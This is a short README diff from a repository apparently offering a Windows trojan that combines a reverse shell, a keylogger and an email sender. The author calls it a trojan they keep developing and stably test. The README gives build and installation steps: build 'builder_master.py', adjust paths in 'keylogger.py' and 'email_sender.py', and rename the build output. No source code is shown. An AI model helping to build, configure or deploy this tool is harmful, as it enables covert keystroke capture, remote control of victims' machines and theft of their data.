eliasd-code/reverse-shell_keylogger_trojan/README.md

 this is a trojan project that i am constantly developing if a new version comes out it has been tested by me and should therefore be stable

 EN: INSTALLATION:
-the installation must be done on windows!
+The installation must be done on windows!
+The paths have to be adjusted in the "keylogger.py" and "email_sender.py"!
 1. Keep the scripts all in one folder
 2. First build the builder_master.py using "python [FILE] build"
 3. Go to the build folder and rename the win.exe folder to "master"